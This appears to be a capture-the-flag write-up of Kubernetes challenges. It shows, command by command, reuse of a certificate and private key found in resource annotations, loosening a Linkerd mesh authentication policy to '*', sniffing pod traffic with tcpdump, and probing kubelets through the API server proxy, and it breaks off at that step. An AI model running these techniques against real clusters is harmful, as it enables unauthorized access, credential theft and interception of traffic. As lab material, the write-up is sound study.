root@jumppod-cd5dfbd7-4ttlf:~# kubectl -n production get pods

NAME READY STATUS RESTARTS AGE

receiver-794df886d7-db57m 3/3 Running 0 16m

There is a pod in there with 3 containers: one for the linkerd-proxy, one for a “receiver”, and one with debug tools. I spent ages trying to figure out how I could connect this to the API gateway before realising it’s probably a dead end, and went back to the default namespace.

I had jumped to the other namespaces very quickly when looking at permissions, so let’s actually go through the permissions in this namespace and list everything we can access.

root@jumppod-cd5dfbd7-4ttlf:~# kubectl get clienttrafficpolicies.gateway.envoyproxy.io -o yaml

apiVersion: v1

items:

- apiVersion: gateway.envoyproxy.io/v1alpha1

kind: ClientTrafficPolicy

metadata:

annotations:

author: smartypants@immagenius.com

cert: LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSURHRENDQWdDZ0F3SUJBZ0lVR09JTEpOWSttdmhCQThMYmJPM2w4eWQrYmlvd0RRWUpLb1pJaHZjTkFRRUwKQlFBd0xERVVNQklHQTFVRUNnd0xUR2x1YTJWeVpDMURWRVl4RkRBU0JnTlZCQU1NQzB4cGJtdGxjbVF0UTFSRwpNQjRYRFRJMk1ESXhPREE0TlRnek5Wb1hEVE0yTURJeE5qQTROVGd6TlZvd0hERWFNQmdHQTFVRUF3d1JUR2x1CmEyVnlaRU5zYVdWdWRGVnpaWEl3Z2dFaU1BMEdDU3FHU0liM0RRRUJBUVVBQTRJQkR3QXdnZ0VLQW9JQkFRQ3UKKy90MVJsQ2FTa0NnVnZyMDRldXFMZktYNkVqeDFDVnZYUXJpdHZYZ2RoL2Y4ZlROQVluaHBuUDNxNEJCTlJSWQp4WUVLWDRBSitpY1ZMTkZvVzBEaHp6UUpzaktJY1loY2RSMXliSUZnOHNSclZKd0VkaDVsbWRSRFJPNlkvbW1ZCjJnT0Z6MWNrQ3lub0VsMGt3M0szbzNGSHdWL2dvNWxUR3RheU5NNGsxVVI1NUlaNjh1WGROUk5GU1pzSGtqU2oKSS9ScDJRU3JWcndDWkNqRUh2NnJWem1XdjFvaFIwMTY1TUxxcWZUdnRDNVpKMzg5MFNlUzBnaFZ1c29ma3c5NQpqTHBpNHJseFVieGZpTkZsWUM1NFA2SVdJOHcvUnMvN2lIWVZvaUxiWFRZOXNDdUR4TnZBcUpVZ3Bsd0h1YXYrCjRtbTljL3ptdUQ2K2tDVC8rTjhyQWdNQkFBR2pRakJBTUIwR0ExVWREZ1FXQkJUN2xLcmVqZHh3Q3UxcHpCaXMKYTNNVEhoeGFtVEFmQmdOVkhTTUVHREFXZ0JSY1dka0I4TUZSMFp6aFJFWjRoM0s5WUkvN1h6QU5CZ2txaGtpRwo5dzBCQVFzRkFBT0NBUUVBUGwxaDlYUFg5Wmx1VnZvdDhLbnY2Q0c1dlBXUFhoSnA4eHVzSkRTQm5Wd3A3UWkzCjdHcy9Sbi9uSU5TMlc2WTdQNy85YjMvQ2l1NEE2cjEvczhPOGJWYjBMdFV6TWNoSGhsQlpsV2grOEtUcS9aeGIKU29hUm9pYU1hcUlRYmVYUWxtZlErTy9wQ2xpMVlnY2plNU9kcHZmK0JTSGo5c3daV3ZNOVFnalVUVEExTmJtVwo1UWhDdkdOUW1JNXZwbVFwb1hzR05EMW5zSUtscWF5elZyMlp3L1BpTnA4cnQwbTFjL0tjRjZscVZVeW1YOEZJCjBKMldKQ09hN3BOZGNzbzIxZzcvZHVkWWJ2MHlSWWtnUDFQUkNOU1huNE1sU0t5aG9HMFZ1dENPcDhEeW85RVIKQ05GUmJXSU0wZFJ5MUM2WCtCUnBqbzNNdVFKU2xRZVpnY1JOZnc9PQotLS0tLUVORCBDRVJUSUZJQ0FURS0tLS0tCg==

comment: putting the cert and key here so they don't get lost :)

key: LS0tLS1CRUdJTiBQUklWQVRFIEtFWS0tLS0tCk1JSUV2Z0lCQURBTkJna3Foa2lHOXcwQkFRRUZBQVNDQktnd2dnU2tBZ0VBQW9JQkFRQ3UrL3QxUmxDYVNrQ2cKVnZyMDRldXFMZktYNkVqeDFDVnZYUXJpdHZYZ2RoL2Y4ZlROQVluaHBuUDNxNEJCTlJSWXhZRUtYNEFKK2ljVgpMTkZvVzBEaHp6UUpzaktJY1loY2RSMXliSUZnOHNSclZKd0VkaDVsbWRSRFJPNlkvbW1ZMmdPRnoxY2tDeW5vCkVsMGt3M0szbzNGSHdWL2dvNWxUR3RheU5NNGsxVVI1NUlaNjh1WGROUk5GU1pzSGtqU2pJL1JwMlFTclZyd0MKWkNqRUh2NnJWem1XdjFvaFIwMTY1TUxxcWZUdnRDNVpKMzg5MFNlUzBnaFZ1c29ma3c5NWpMcGk0cmx4VWJ4ZgppTkZsWUM1NFA2SVdJOHcvUnMvN2lIWVZvaUxiWFRZOXNDdUR4TnZBcUpVZ3Bsd0h1YXYrNG1tOWMvem11RDYrCmtDVC8rTjhyQWdNQkFBRUNnZ0VBQ2pJNzN0QldmRzE4ejFzQ0pWdWN2ZGZia1BRUWZCQ0U5ZWZlYlZCUmlxdjkKMEVwckJCOFkxSUdpNTNqVm8vY1IxTmpLS0lndHFXY3JYd2ptdVVXVXhlQjMwRERUTnBXOVp5OW5DcW5YSWJuZApSMXZLWUZuR2N0eFoxbW1oZFpNdGl6dkZ0L255OVl2by9BUjVIcEZKeE1XWnV3WGJsTVBOUlY3UnlYRlpkb2w4CmZidHlhRkswdWY3T0krclhkTk5henQrSHRQZmZscHRaUkh4dy9XU2l6OHlldVB5QTNvYWEvbHBXb21uY0M2VTQKZXpJbzZiaUxEWFgyKzgwblc2bFI4VnZQa0daL1B1Y2lMa3c3enhJbDNDZU1tVGxCR29hemlSaGM4YkRYK3BiOApWR0JXd3Y3VDJFMk4zSEk1QmxCTlNOYWdyc0ZueEF0dFpyaURNeUtRVVFLQmdRRGlpUW9SMXJIbHdPMmFrRG5oCis1OVpFTVplRG9MSk1SNHkraUoycGY1V3Z3R1lEaVFrNXRMc3FkVWZOM2EwSS9ZNFRTYUtnTFkrbCs2ZCtKWHMKLzdpNE9YbktFSGtZeE9SYk1hcU1jNGJZalVTU29mOG9DTlpGc1BzaFh1VkRRTFJyL0hoV09nK3ZlQ21WekxPSwoyZ1hjckdMUmdhUEo4YWI1UUg2WnBXSjBWUUtCZ1FERnZuSWpGaklGWmtyWFVKTVRrWkRMUjZuNGFWeTg0VHZYCmg2dzlLYnlSMmpFMVhOZkt3akwwcVkzZTIwRk0wTExGV2F0Mm94ckFQNHZWN3UwbFFVV3VCK01LR24vMkVLS2QKVmZ0bzVXL0l2cmp3UGtGa1JqaEFnc015ODFPUlEwSlprWWwyRmpLSGJsaFlyS3c0L3ZTem1aQXl3U2dyZzBzSwphT1FFcisyRmZ3S0JnQk1KRnVxRzB1NE9keWpNdzhCa2gzQlJnNG0xeUhHbGlmY1lvN3E2bWhPcCt6Vk93dVRDCjdLaHNZUGM5anVEMlFLTmNnRWVWSnpzOVF4VE5KYlFEalA4Vi9WRG9iM1NRWHV2MjBYRDU2RFBjTXczclJPaVYKVFlRUHFocVV3Y2tUNzlVL0l0R0VFWHRhS294bTVoTmQzSzQ5WWhSZXcyZWR3YjBpR1VGSjcycjlBb0dCQUpJVgp2L3hyeVVoejZaWm4wRUFFcWhPRFBlNW02RHdocVRQdzV5M0lSNmI0cXFIaGxRb1ZyYzlSODUxUUhVM0NZRStyCmp5QjJIcTBvUlFZbkhNc0pEWkVrQW5iVVhQUk1GZFptVHZXUGlxV2pRTDA3UU5QempGc2NQMWpFcWxnR2VGM3oKUnJvV2EvM2haeU1iYmFBdHVsbDBlVE1GdjhkbGwycDVVdnFqZmJ
YQkFvR0JBT0NmYzNtTGM0QlBWdkw5WVdjWApTSG82cVQzS0lucjNpckh2Q25qa253L1lkZmI3TFF5dnFjaEkrMjU5RExBbnlROExjK2czbEdKaUYvQ2ZzMnl2ClVyUDM5TkgxOXpPSnFrV3I2VjVmcmZtMlZUWncwczFrbldVU0RmT0MwTlowUktxdU1SU1dSdnFMT3ZxUFhicDgKWWd2bWk2WnA2ZzlpMnYwVFRPaUd0N3hwCi0tLS0tRU5EIFBSSVZBVEUgS0VZLS0tLS0K

creationTimestamp: "2026-03-25T10:50:57Z"

generation: 1

name: enable-mtls

namespace: default

resourceVersion: "1759"

uid: 770a1903-f7a4-415a-bd2e-5951f790a75e

spec:

targetRef:

group: gateway.networking.k8s.io

kind: Gateway

name: public-gateway

tls:

clientValidation:

caCertificateRefs:

- group: ""

kind: Secret

name: client-ca-secret

status:

ancestors:

- ancestorRef:

group: gateway.networking.k8s.io

kind: Gateway

name: public-gateway

namespace: default

conditions:

- lastTransitionTime: "2026-03-25T10:50:57Z"

message: Policy has been accepted.

observedGeneration: 1

reason: Accepted

status: "True"

type: Accepted

controllerName: gateway.envoyproxy.io/gatewayclass-controller

kind: List

metadata:

resourceVersion: ""

Well... that looks like a certificate and key. Let’s grab those and try using them as a client certificate.
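The cert and key annotations are base64-encoded PEM, which is easy to confirm before writing anything to disk. A small Python sketch of that check, separate from the shell commands actually used in this writeup; decode_pem_annotation is a hypothetical helper, and only the first 36 characters of the cert annotation are used in the example.

```python
import base64


def decode_pem_annotation(value: str) -> str:
    """Base64-decode an annotation value and check that it looks like PEM."""
    text = base64.b64decode(value, validate=True).decode("ascii")
    if not text.startswith("-----BEGIN "):
        raise ValueError("decoded value does not start with a PEM header")
    return text


# Prefix of the cert annotation above, just enough to reveal the header line.
print(decode_pem_annotation("LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0t"))
# prints -----BEGIN CERTIFICATE-----
```

The same function applied to the full cert and key values would give the text to store as cert.pem and key.pem.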

root@jumppod-cd5dfbd7-4ttlf:~# base64 -d <<< LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSURHRENDQWdDZ0F3SUJBZ0lVR09JTEpOWSttdmhCQThMYmJPM2w4eWQrYmlvd0RRWUpLb1pJaHZjTkFRRUwKQlFBd0xERVVNQklHQTFVRUNnd0xUR2x1YTJWeVpDMURWRVl4RkRBU0JnTlZCQU1NQzB4cGJtdGxjbVF0UTFSRwpNQjRYRFRJMk1ESXhPREE0TlRnek5Wb1hEVE0yTURJeE5qQTROVGd6TlZvd0hERWFNQmdHQTFVRUF3d1JUR2x1CmEyVnlaRU5zYVdWdWRGVnpaWEl3Z2dFaU1BMEdDU3FHU0liM0RRRUJBUVVBQTRJQkR3QXdnZ0VLQW9JQkFRQ3UKKy90MVJsQ2FTa0NnVnZyMDRldXFMZktYNkVqeDFDVnZYUXJpdHZYZ2RoL2Y4ZlROQVluaHBuUDNxNEJCTlJSWQp4WUVLWDRBSitpY1ZMTkZvVzBEaHp6UUpzaktJY1loY2RSMXliSUZnOHNSclZKd0VkaDVsbWRSRFJPNlkvbW1ZCjJnT0Z6MWNrQ3lub0VsMGt3M0szbzNGSHdWL2dvNWxUR3RheU5NNGsxVVI1NUlaNjh1WGROUk5GU1pzSGtqU2oKSS9ScDJRU3JWcndDWkNqRUh2NnJWem1XdjFvaFIwMTY1TUxxcWZUdnRDNVpKMzg5MFNlUzBnaFZ1c29ma3c5NQpqTHBpNHJseFVieGZpTkZsWUM1NFA2SVdJOHcvUnMvN2lIWVZvaUxiWFRZOXNDdUR4TnZBcUpVZ3Bsd0h1YXYrCjRtbTljL3ptdUQ2K2tDVC8rTjhyQWdNQkFBR2pRakJBTUIwR0ExVWREZ1FXQkJUN2xLcmVqZHh3Q3UxcHpCaXMKYTNNVEhoeGFtVEFmQmdOVkhTTUVHREFXZ0JSY1dka0I4TUZSMFp6aFJFWjRoM0s5WUkvN1h6QU5CZ2txaGtpRwo5dzBCQVFzRkFBT0NBUUVBUGwxaDlYUFg5Wmx1VnZvdDhLbnY2Q0c1dlBXUFhoSnA4eHVzSkRTQm5Wd3A3UWkzCjdHcy9Sbi9uSU5TMlc2WTdQNy85YjMvQ2l1NEE2cjEvczhPOGJWYjBMdFV6TWNoSGhsQlpsV2grOEtUcS9aeGIKU29hUm9pYU1hcUlRYmVYUWxtZlErTy9wQ2xpMVlnY2plNU9kcHZmK0JTSGo5c3daV3ZNOVFnalVUVEExTmJtVwo1UWhDdkdOUW1JNXZwbVFwb1hzR05EMW5zSUtscWF5elZyMlp3L1BpTnA4cnQwbTFjL0tjRjZscVZVeW1YOEZJCjBKMldKQ09hN3BOZGNzbzIxZzcvZHVkWWJ2MHlSWWtnUDFQUkNOU1huNE1sU0t5aG9HMFZ1dENPcDhEeW85RVIKQ05GUmJXSU0wZFJ5MUM2WCtCUnBqbzNNdVFKU2xRZVpnY1JOZnc9PQotLS0tLUVORCBDRVJUSUZJQ0FURS0tLS0tCg== > cert.pem

root@jumppod-cd5dfbd7-4ttlf:~# base64 -d <<< LS0tLS1CRUdJTiBQUklWQVRFIEtFWS0tLS0tCk1JSUV2Z0lCQURBTkJna3Foa2lHOXcwQkFRRUZBQVNDQktnd2dnU2tBZ0VBQW9JQkFRQ3UrL3QxUmxDYVNrQ2cKVnZyMDRldXFMZktYNkVqeDFDVnZYUXJpdHZYZ2RoL2Y4ZlROQVluaHBuUDNxNEJCTlJSWXhZRUtYNEFKK2ljVgpMTkZvVzBEaHp6UUpzaktJY1loY2RSMXliSUZnOHNSclZKd0VkaDVsbWRSRFJPNlkvbW1ZMmdPRnoxY2tDeW5vCkVsMGt3M0szbzNGSHdWL2dvNWxUR3RheU5NNGsxVVI1NUlaNjh1WGROUk5GU1pzSGtqU2pJL1JwMlFTclZyd0MKWkNqRUh2NnJWem1XdjFvaFIwMTY1TUxxcWZUdnRDNVpKMzg5MFNlUzBnaFZ1c29ma3c5NWpMcGk0cmx4VWJ4ZgppTkZsWUM1NFA2SVdJOHcvUnMvN2lIWVZvaUxiWFRZOXNDdUR4TnZBcUpVZ3Bsd0h1YXYrNG1tOWMvem11RDYrCmtDVC8rTjhyQWdNQkFBRUNnZ0VBQ2pJNzN0QldmRzE4ejFzQ0pWdWN2ZGZia1BRUWZCQ0U5ZWZlYlZCUmlxdjkKMEVwckJCOFkxSUdpNTNqVm8vY1IxTmpLS0lndHFXY3JYd2ptdVVXVXhlQjMwRERUTnBXOVp5OW5DcW5YSWJuZApSMXZLWUZuR2N0eFoxbW1oZFpNdGl6dkZ0L255OVl2by9BUjVIcEZKeE1XWnV3WGJsTVBOUlY3UnlYRlpkb2w4CmZidHlhRkswdWY3T0krclhkTk5henQrSHRQZmZscHRaUkh4dy9XU2l6OHlldVB5QTNvYWEvbHBXb21uY0M2VTQKZXpJbzZiaUxEWFgyKzgwblc2bFI4VnZQa0daL1B1Y2lMa3c3enhJbDNDZU1tVGxCR29hemlSaGM4YkRYK3BiOApWR0JXd3Y3VDJFMk4zSEk1QmxCTlNOYWdyc0ZueEF0dFpyaURNeUtRVVFLQmdRRGlpUW9SMXJIbHdPMmFrRG5oCis1OVpFTVplRG9MSk1SNHkraUoycGY1V3Z3R1lEaVFrNXRMc3FkVWZOM2EwSS9ZNFRTYUtnTFkrbCs2ZCtKWHMKLzdpNE9YbktFSGtZeE9SYk1hcU1jNGJZalVTU29mOG9DTlpGc1BzaFh1VkRRTFJyL0hoV09nK3ZlQ21WekxPSwoyZ1hjckdMUmdhUEo4YWI1UUg2WnBXSjBWUUtCZ1FERnZuSWpGaklGWmtyWFVKTVRrWkRMUjZuNGFWeTg0VHZYCmg2dzlLYnlSMmpFMVhOZkt3akwwcVkzZTIwRk0wTExGV2F0Mm94ckFQNHZWN3UwbFFVV3VCK01LR24vMkVLS2QKVmZ0bzVXL0l2cmp3UGtGa1JqaEFnc015ODFPUlEwSlprWWwyRmpLSGJsaFlyS3c0L3ZTem1aQXl3U2dyZzBzSwphT1FFcisyRmZ3S0JnQk1KRnVxRzB1NE9keWpNdzhCa2gzQlJnNG0xeUhHbGlmY1lvN3E2bWhPcCt6Vk93dVRDCjdLaHNZUGM5anVEMlFLTmNnRWVWSnpzOVF4VE5KYlFEalA4Vi9WRG9iM1NRWHV2MjBYRDU2RFBjTXczclJPaVYKVFlRUHFocVV3Y2tUNzlVL0l0R0VFWHRhS294bTVoTmQzSzQ5WWhSZXcyZWR3YjBpR1VGSjcycjlBb0dCQUpJVgp2L3hyeVVoejZaWm4wRUFFcWhPRFBlNW02RHdocVRQdzV5M0lSNmI0cXFIaGxRb1ZyYzlSODUxUUhVM0NZRStyCmp5QjJIcTBvUlFZbkhNc0pEWkVrQW5iVVhQUk1GZFptVHZXUGlxV2pRTDA3UU5QempGc2NQMWpFcWxnR2VGM3oKUnJvV2EvM2h
aeU1iYmFBdHVsbDBlVE1GdjhkbGwycDVVdnFqZmJYQkFvR0JBT0NmYzNtTGM0QlBWdkw5WVdjWApTSG82cVQzS0lucjNpckh2Q25qa253L1lkZmI3TFF5dnFjaEkrMjU5RExBbnlROExjK2czbEdKaUYvQ2ZzMnl2ClVyUDM5TkgxOXpPSnFrV3I2VjVmcmZtMlZUWncwczFrbldVU0RmT0MwTlowUktxdU1SU1dSdnFMT3ZxUFhicDgKWWd2bWk2WnA2ZzlpMnYwVFRPaUd0N3hwCi0tLS0tRU5EIFBSSVZBVEUgS0VZLS0tLS0K > key.pem

root@jumppod-cd5dfbd7-4ttlf:~# curl https://10.111.132.153 -k --cert cert.pem --key key.pem

<!DOCTYPE html>

<html>

<head>

<title>Operation: Shadow Mesh </title>

</head>

<body>

<pre>

Target Acquired: flag_ctf{those_creds_left_there}!

Lekker bezig! (Great job!) The intel you just retrieved points to your next objective: a high-value service hiding deep within the "supersecret" namespace.

</pre>

</body>

</html>

Nice. There is the first flag, and it has given us a pointer to the second.
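As a rough sketch of the decode step used for this flag, the helper below (decode_pem is a made-up name, not something from the challenge) decodes a base64 value into a file and checks that the result starts with a PEM header before it is handed to curl. It assumes a coreutils-style base64 that accepts -d.

```shell
# decode_pem B64 OUTFILE  (hypothetical helper, not part of the challenge)
# Decodes a base64 string into OUTFILE and succeeds only if the result
# starts with a PEM "-----BEGIN ...-----" line.
decode_pem() {
  printf '%s' "$1" | base64 -d > "$2" || return 1
  head -n 1 "$2" | grep -q '^-----BEGIN [A-Z ]*-----$'
}
```

Something like decode_pem "$CERT_B64" cert.pem && decode_pem "$KEY_B64" key.pem would then produce the two files passed to curl, where CERT_B64 and KEY_B64 are placeholder variables holding the two base64 values.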

root@jumppod-cd5dfbd7-4ttlf:~# kubectl -n supersecret auth can-i --list

Resources Non-Resource URLs Resource Names Verbs

selfsubjectreviews.authentication.k8s.io [] [] [create]

selfsubjectaccessreviews.authorization.k8s.io [] [] [create]

selfsubjectrulesreviews.authorization.k8s.io [] [] [create]

meshtlsauthentications.policy.linkerd.io [] [] [get watch list update patch]

namespaces [] [] [get watch list]

services [] [] [get watch list]

clienttrafficpolicies.gateway.envoyproxy.io [] [] [get watch list]

envoyproxies.gateway.envoyproxy.io [] [] [get watch list]

gateways.gateway.networking.k8s.io [] [] [get watch list]

[/.well-known/openid-configuration/] [] [get]

[/.well-known/openid-configuration] [] [get]

[/api/*] [] [get]

[/api] [] [get]

[/apis/*] [] [get]

[/apis] [] [get]

[/healthz] [] [get]

[/healthz] [] [get]

[/livez] [] [get]

[/livez] [] [get]

[/openapi/*] [] [get]

[/openapi] [] [get]

[/openid/v1/jwks/] [] [get]

[/openid/v1/jwks] [] [get]

[/readyz] [] [get]

[/readyz] [] [get]

[/version/] [] [get]

[/version/] [] [get]

[/version] [] [get]

[/version] [] [get]

OK, so in this namespace I can update and patch meshtlsauthentications.policy.linkerd.io. I assume there will be a service that uses that resource to control which mesh identities can access it. (I forgot to save the get svc output, but there was a service at 10.99.153.131:8080).
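The can-i listings in this writeup are mostly non-resource URL rows, which makes the interesting rules easy to miss. A small filter along these lines (resource_rules is a hypothetical name) keeps only the header and the rows that name a resource. It assumes the column layout shown above, where non-resource rows begin with a bracketed path.

```shell
# resource_rules  (hypothetical helper)
# Reads `kubectl auth can-i --list` output on stdin and keeps the header
# plus rows whose first column is a resource name, dropping blank lines
# and rows that start with a bracketed non-resource URL such as [/healthz].
resource_rules() {
  awk 'NF && (NR == 1 || $1 !~ /^\[/)'
}
```

It would be used as kubectl -n supersecret auth can-i --list | resource_rules.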

root@jumppod-cd5dfbd7-4ttlf:~# kubectl -n supersecret get meshtlsauthentications.policy.linkerd.io -o yaml

apiVersion: v1

items:

- apiVersion: policy.linkerd.io/v1alpha1

kind: MeshTLSAuthentication

metadata:

creationTimestamp: "2026-03-25T10:50:20Z"

generation: 1

name: supersecret

namespace: supersecret

resourceVersion: "1494"

uid: 2bfa8bf8-bd90-48b7-9586-48fc23a59420

spec:

identities:

- default.supersecret.serviceaccount.identity.linkerd.cluster.local

kind: List

metadata:

resourceVersion: ""

Right, let’s just update that and add * to the allowed list of identities.

root@jumppod-cd5dfbd7-4ttlf:~# kubectl -n supersecret edit meshtlsauthentications.policy.linkerd.io supersecret

meshtlsauthentication.policy.linkerd.io/supersecret
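The same change can probably be made without an interactive editor. The sketch below builds a JSON merge patch for spec.identities. identities_patch is a made-up helper name, and it assumes the identities contain no characters that need JSON escaping. Note that a merge patch replaces the whole list rather than appending to it.

```shell
# identities_patch ID...  (hypothetical helper)
# Prints a JSON merge patch that sets spec.identities to the given values.
# Assumes the values contain no quotes or backslashes.
identities_patch() {
  list=""
  for id in "$@"; do
    list="${list}${list:+,}\"${id}\""
  done
  printf '{"spec":{"identities":[%s]}}' "$list"
}

# apply_identities ID...: needs kubectl and the patch verb on the resource.
apply_identities() {
  kubectl -n supersecret patch meshtlsauthentications.policy.linkerd.io supersecret \
    --type merge -p "$(identities_patch "$@")"
}
```

Calling apply_identities '*' would send {"spec":{"identities":["*"]}}, which should have the same effect as the edit above.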

With that done, we can curl the service from any pod in the Linkerd mesh. Luckily, I remember from playing in the production namespace earlier that the receiver pod was in the mesh.

root@jumppod-cd5dfbd7-4ttlf:~# kubectl -n production exec -ti receiver-794df886d7-db57m -c debug-tools -- bash

root@receiver-794df886d7-db57m:/# curl 10.99.153.131:8080

<!DOCTYPE html>

<html>

<head>

<title>Operation: Shadow Mesh</title>

</head>

<body>

<pre>

Target Acquired: flag_ctf{not_so_supersecret_anymore}

Outstanding work breaching the <code>supersecret</code> namespace. But don't drop your shell just yet—you are already sitting right on top of your final objective.

A highly classified payload hits this pod every 5 seconds, but the application itself won't tell you anything.

Take a closer look at the company inside the "receiver" deployment pod. It turns out one of the roommates has a pre-installed tool with a real talent for "sniffing" and dumping TCP traffic.

</pre>

</body>

</html>

One more to go. This sounds super simple as well. We are already in the debug container, and I remember seeing in the pod spec that it had CAP_NET_RAW and CAP_NET_ADMIN. Containers in a pod share a network namespace, so we see the same traffic as the receiver container and should be able to tcpdump our way through.

root@receiver-794df886d7-db57m:/# tcpdump -i any -A -s0

tcpdump: WARNING: any: That device doesn't support promiscuous mode

(Promiscuous mode not supported on the "any" device)

tcpdump: verbose output suppressed, use -v[v]... for full protocol decode

listening on any, link-type LINUX_SLL2 (Linux cooked v2), snapshot length 262144 bytes

[..SNIP..]

HTTP/1.1

E.....@.@.....T...T........=Y..7....+R.....

..5*..5*GET / HTTP/1.1

host: receiver.production:8080

user-agent: curl/8.14.1

accept: */*

x-flag: flag_ctf{caught_in_the_wire}

l5d-client-id: default.supersecret.serviceaccount.identity.linkerd.cluster.local

[..SNIP..]

There is the final flag. One more set of challenges to go!
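Scrolling through raw tcpdump output works, but a filter makes the flag easier to spot. This is a minimal sketch that assumes flags always look like flag_ctf{...}, as they do in this CTF. extract_flags is a hypothetical helper name.

```shell
# extract_flags  (hypothetical helper)
# Reads text or binary data on stdin and prints every substring that
# matches the flag_ctf{...} shape used in this CTF.
extract_flags() {
  grep -a -o 'flag_ctf{[^}]*}'
}
```

Inside the debug container this could be fed with tcpdump -i any -A -s0 -l 2>/dev/null | extract_flags, where -l asks tcpdump to line-buffer its output. Matches may still appear with some delay, depending on how grep buffers its own output.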

Challenge 3 - Stealth Let

Connecting to this challenge, we get the following text:

____ ____ ____ __ __ ____ _ _ __ ____ ____

/ ___)(_ _)( __) / _\ ( ) (_ _)/ )( \ ___ ( ) ( __)(_ _)

\___ \ )( ) _) / \/ (_/\ )( ) __ ((___)/ (_/\ ) _) )(

(____/ (__) (____)\_/\_/\____/(__) \_)(_/ \____/(____) (__)

------------------------------------------------------------

| |

| Hidden '/etc/secret's are crossing our skies. |

| Let’s find out what’s really going on. |

| |

------------------------------------------------------------

| |

| We have already identified a plane |

| Have a look at the "b2" namespace. |

| |

------------------------------------------------------------

| |

| ! WARNING ! |

| NO INTERNET CONNECTIVITY DETECTED |

| |

------------------------------------------------------------

OK, so we won’t be able to fetch tools from the internet. That’s fine. Beyond that, we know which path to look for in pods (/etc/secret) and have a starting namespace.

root@jumphost-5f66c55446-r5c4r:~# kubectl auth whoami

ATTRIBUTE VALUE

Username system:serviceaccount:jumphost:jumphost

UID 66442f36-246b-4839-9327-abefe758b043

Groups [system:serviceaccounts system:serviceaccounts:jumphost system:authenticated]

Extra: authentication.kubernetes.io/credential-id [JTI=ce8080be-b2cd-4c7f-8391-aadb1e7effb3]

Extra: authentication.kubernetes.io/node-name [node-1]

Extra: authentication.kubernetes.io/node-uid [fd6d7e48-9cc3-4bf6-baa0-96f9e80cc2f0]

Extra: authentication.kubernetes.io/pod-name [jumphost-5f66c55446-r5c4r]

Extra: authentication.kubernetes.io/pod-uid [28daeffd-9726-4887-922c-4b0d7f9af62c]

root@jumphost-5f66c55446-r5c4r:~# kubectl -n b2 auth can-i --list

Resources Non-Resource URLs Resource Names Verbs

selfsubjectreviews.authentication.k8s.io [] [] [create]

selfsubjectaccessreviews.authorization.k8s.io [] [] [create]

selfsubjectrulesreviews.authorization.k8s.io [] [] [create]

pods/exec [] [] [get list create]

pods [] [] [get list]

[/.well-known/openid-configuration/] [] [get]

[/.well-known/openid-configuration] [] [get]

[/api/*] [] [get]

[/api] [] [get]

[/apis/*] [] [get]

[/apis] [] [get]

[/healthz] [] [get]

[/healthz] [] [get]

[/livez] [] [get]

[/livez] [] [get]

[/openapi/*] [] [get]

[/openapi] [] [get]

[/openid/v1/jwks/] [] [get]

[/openid/v1/jwks] [] [get]

[/readyz] [] [get]

[/readyz] [] [get]

[/version/] [] [get]

[/version/] [] [get]

[/version] [] [get]

[/version] [] [get]

Looks like we have the ability to exec into pods. Let’s list the pods, and see if there is one we can jump into.

root@jumphost-5f66c55446-r5c4r:~# kubectl -n b2 get pods

NAME READY STATUS RESTARTS AGE

b2-6454ffccfb-xb9sd 1/1 Running 0 18m

root@jumphost-5f66c55446-r5c4r:~# kubectl -n b2 exec -ti b2-6454ffccfb-xb9sd -- bash

WARNING: AIRGAP CONFIGURATION DETECTED.

root@b2-6454ffccfb-xb9sd:~# cd /etc/secret/

root@b2-6454ffccfb-xb9sd:/etc/secret# ls

flag hint

root@b2-6454ffccfb-xb9sd:/etc/secret# cat flag

flag_ctf{not_really_stealth_right}

First flag.

Moving on, let’s see if there’s more we can get from this pod.

root@b2-6454ffccfb-xb9sd:/etc/secret# kubectl auth whoami

ATTRIBUTE VALUE

Username system:serviceaccount:b2:stealth

UID 47060ea1-e6cf-46bb-a650-2e06892201b4

Groups [system:serviceaccounts system:serviceaccounts:b2 system:authenticated]

Extra: authentication.kubernetes.io/credential-id [JTI=9e898a9e-d937-4ca9-8037-682d8869bf18]

Extra: authentication.kubernetes.io/node-name [node-2]

Extra: authentication.kubernetes.io/node-uid [0c1e4a7d-06cf-409c-b114-e6dd0bdf1f82]

Extra: authentication.kubernetes.io/pod-name [b2-6454ffccfb-xb9sd]

Extra: authentication.kubernetes.io/pod-uid [9db13eef-bfa7-4ca3-8d3d-b0c73ddbac5a]

root@b2-6454ffccfb-xb9sd:/etc/secret# kubectl auth can-i --list

Resources Non-Resource URLs Resource Names Verbs

selfsubjectreviews.authentication.k8s.io [] [] [create]

selfsubjectaccessreviews.authorization.k8s.io [] [] [create]

selfsubjectrulesreviews.authorization.k8s.io [] [] [create]

nodes/proxy [] [] [get watch list]

nodes [] [] [get watch list]

[/.well-known/openid-configuration/] [] [get]

[/.well-known/openid-configuration] [] [get]

[/api/*] [] [get]

[/api] [] [get]

[/apis/*] [] [get]

[/apis] [] [get]

[/healthz] [] [get]

[/healthz] [] [get]

[/livez] [] [get]

[/livez] [] [get]

[/openapi/*] [] [get]

[/openapi] [] [get]

[/openid/v1/jwks/] [] [get]

[/openid/v1/jwks] [] [get]

[/readyz] [] [get]

[/readyz] [] [get]

[/version/] [] [get]

[/version/] [] [get]

[/version] [] [get]

[/version] [] [get]

Nice, OK, we have get on nodes/proxy. That means we can list pods, and execute commands in them, through the Kubelet. That is a fairly privileged position.

Let’s try connecting to a Kubelet.

root@b2-6454ffccfb-xb9sd:~# kubectl get node -o wide | awk '{print $6}' | grep -v INTERN | while read ip; do curl -v -k --connect-timeout 1 https://${ip}:10250/pods ; done

* Trying 10.0.175.86:10250...

* After 1000ms connect time, move on!

* connect to 10.0.175.86 port 10250 failed: Connection timed out

* Connection timeout after 1000 ms

* Closing connection 0

curl: (28) Connection timeout after 1000 ms

* Trying 10.0.181.172:10250...

* After 1000ms connect time, move on!

* connect to 10.0.181.172 port 10250 failed: Connection timed out

* Connection timeout after 1000 ms

* Closing connection 0

curl: (28) Connection timeout after 1000 ms

* Trying 10.0.140.243:10250...

* After 1000ms connect time, move on!

* connect to 10.0.140.243 port 10250 failed: Connection timed out

* Connection timeout after 1000 ms

* Closing connection 0

curl: (28) Connection timeout after 1000 ms

Hmm… I can’t seem to connect to any of them. Clearly the network filtering is extensive.

I spend a while trying to find another port, or going through the original jumphost, to no avail. Eventually I remember that the API server has built-in proxy capabilities, and we can clearly talk to the API server.

Let’s try pivoting through that.

root@b2-6454ffccfb-xb9sd:~# kubectl get --raw /api/v1/nodes/master-1/proxy/pods

